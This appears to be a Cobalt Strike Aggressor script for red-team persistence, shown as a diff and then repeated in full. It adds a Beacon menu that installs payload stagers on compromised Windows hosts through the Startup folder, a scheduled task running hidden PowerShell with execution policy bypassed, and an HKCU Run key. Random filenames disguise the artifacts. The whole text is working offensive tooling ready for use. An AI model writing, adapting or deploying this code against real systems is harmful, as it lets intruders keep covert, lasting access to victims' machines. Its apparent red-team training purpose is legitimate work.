RCStep · February 29, 2024 19:38
diff --git a/rto_persistence.cna b/rto_persistence.cna
 popup beacon_bottom
 {
    menu "Persistence"
    {
        menu "Userland"
        {
            item "Startup Folder"
            {
                startup_folder($1);
            }
            item "Scheduled Task"
            {
                scheduled_task($1);
            }
            item "HKCU Autorun"
            {
                hkcu_persistence($1);
            }
        }
    }
 }

 sub startup_folder
 {
    $bid = $1;
    
    openPayloadHelper(lambda({

        blog2($bid, "Tasked Beacon to install Startup Folder Persistence using " . listener_describe($1));

        $artifact = artifact_stager($1, "powershell", "x64");
        $comp = powershell_compress($artifact);
        $cmd = powershell_command($comp, false);
        $filename = get_random_filename();
        $rawname = binfo($bid[0], "user");
        prompt_text("Set Persistence username (remove *)", $rawname, {
            $username = $1;
            bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat", $cmd);
            blog2($bid, "Persistence payload uploaded to C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat");
            blog2($bid, "Startup Folder Persistence set for " . $username . "");

        });   
    }));
 }

 sub scheduled_task
 {
    $bid = $1;

    $dialog = dialog("Scheduled Task Persistence", %(int => "4", dur => "30", user => binfo($bid[0], "user")), lambda({

        $int = $3['int'];
        $dur = $3['dur'];
        $listener = $3['listener'];
        $username = $3['user'];

        blog2($bid, "Tasked Beacon to install Scheduled Task Persistence using " . listener_describe($listener));

        $artifact = artifact_stager($listener, "powershell", "x64");
        $comp = powershell_compress($artifact);
        $filename = get_random_filename();
        $path = "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .ps1";

        bupload_raw!($bid, $path, $comp);

        $taskname = get_random_filename();
        $trg = "\$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Hours  $+ $int $+ ) -RepetitionDuration (New-TimeSpan -Days  $+ $dur $+ )";
        $act = "\$action = New-ScheduledTaskAction -Execute \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Argument \"-Sta -Nop -Window Hidden -Exec Bypass -File  $+ $path $+  \" -WorkingDirectory \"C:\\Windows\\System32\"";
        $reg = "Register-ScheduledTask -TaskName  $+ $taskname $+  -Trigger \$trigger -Action \$action -Force";

        bpowershell!($bid, " $+ $trg $+ ;  $+ $act $+ ;  $+ $reg $+ ");
        blog2($bid, "Persistence payload uploaded to " . $path . "");
        blog2($bid, "Scheduled Task Persistence set for " . $username . "");

    }));

    drow_text($dialog, "int", "Interval (Hours)");
    drow_text($dialog, "dur", "Duration (Days)");
    drow_text($dialog, "user", "Username (remove *)");
    drow_listener($dialog, "listener", "Listener: ");
    dbutton_action($dialog, "Go");
    dialog_show($dialog);
 }

 sub hkcu_persistence
 {
    $bid = $1;

    openPayloadHelper(lambda({

        blog2($bid, "Tasked Beacon to install HKCU Persistence using " . listener_describe($1));

        $artifact = artifact_stager($1, "exe", "x64");
        $filename = get_random_filename();
        $regname = get_random_filename();
        $rawname = binfo($bid[0], "user");
        prompt_text("Set Persistence username (remove *)", $rawname, {
            $username = $1;

            bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe", $artifact);
            bpowershell!($bid, "New-ItemProperty -Path HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name \" $+ $regname $+ \" -PropertyType ExpandString -Value \"C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe\" -Force");
            blog2($bid, "Persistence payload uploaded to C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe");
            blog2($bid, "HKCU Run Key Persistence set for ". $username ."");
            

        });  
    }));
 }

 sub get_random_filename
 {
    @chars = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
    @result = @();

    for ($length = 8; $length > 0; $length--)
    {
        add(@result, rand(@chars), 0);
    }

    return join("", @result);
 }
	popup beacon_bottom
	{
	menu "Persistence"
	{
	menu "Userland"
	{
	item "Startup Folder"
	{
	startup_folder($1);
	}
	item "Scheduled Task"
	{
	scheduled_task($1);
	}
	item "HKCU Autorun"
	{
	hkcu_persistence($1);
	}
	}
	}
	}

	sub startup_folder
	{
	$bid = $1;

	openPayloadHelper(lambda({

	blog2($bid, "Tasked Beacon to install Startup Folder Persistence using " . listener_describe($1));

	$artifact = artifact_stager($1, "powershell", "x64");
	$comp = powershell_compress($artifact);
	$cmd = powershell_command($comp, false);
	$filename = get_random_filename();
	$rawname = binfo($bid[0], "user");
	prompt_text("Set Persistence username (remove *)", $rawname, {
	$username = $1;
	bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat", $cmd);
	blog2($bid, "Persistence payload uploaded to C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat");
	blog2($bid, "Startup Folder Persistence set for " . $username . "");

	});
	}));
	}

	sub scheduled_task
	{
	$bid = $1;

	$dialog = dialog("Scheduled Task Persistence", %(int => "4", dur => "30", user => binfo($bid[0], "user")), lambda({

	$int = $3['int'];
	$dur = $3['dur'];
	$listener = $3['listener'];
	$username = $3['user'];

	blog2($bid, "Tasked Beacon to install Scheduled Task Persistence using " . listener_describe($listener));

	$artifact = artifact_stager($listener, "powershell", "x64");
	$comp = powershell_compress($artifact);
	$filename = get_random_filename();
	$path = "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .ps1";

	bupload_raw!($bid, $path, $comp);

	$taskname = get_random_filename();
	$trg = "\$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Hours $+ $int $+ ) -RepetitionDuration (New-TimeSpan -Days $+ $dur $+ )";
	$act = "\$action = New-ScheduledTaskAction -Execute \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Argument \"-Sta -Nop -Window Hidden -Exec Bypass -File $+ $path $+ \" -WorkingDirectory \"C:\\Windows\\System32\"";
	$reg = "Register-ScheduledTask -TaskName $+ $taskname $+ -Trigger \$trigger -Action \$action -Force";

	bpowershell!($bid, " $+ $trg $+ ; $+ $act $+ ; $+ $reg $+ ");
	blog2($bid, "Persistence payload uploaded to " . $path . "");
	blog2($bid, "Scheduled Task Persistence set for " . $username . "");

	}));

	drow_text($dialog, "int", "Interval (Hours)");
	drow_text($dialog, "dur", "Duration (Days)");
	drow_text($dialog, "user", "Username (remove *)");
	drow_listener($dialog, "listener", "Listener: ");
	dbutton_action($dialog, "Go");
	dialog_show($dialog);
	}

	sub hkcu_persistence
	{
	$bid = $1;

	openPayloadHelper(lambda({

	blog2($bid, "Tasked Beacon to install HKCU Persistence using " . listener_describe($1));

	$artifact = artifact_stager($1, "exe", "x64");
	$filename = get_random_filename();
	$regname = get_random_filename();
	$rawname = binfo($bid[0], "user");
	prompt_text("Set Persistence username (remove *)", $rawname, {
	$username = $1;

	bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe", $artifact);
	bpowershell!($bid, "New-ItemProperty -Path HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name \" $+ $regname $+ \" -PropertyType ExpandString -Value \"C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe\" -Force");
	blog2($bid, "Persistence payload uploaded to C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe");
	blog2($bid, "HKCU Run Key Persistence set for ". $username ."");


	});
	}));
	}

	sub get_random_filename
	{
	@chars = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
	@result = @();

	for ($length = 8; $length > 0; $length--)
	{
	add(@result, rand(@chars), 0);
	}

	return join("", @result);
	}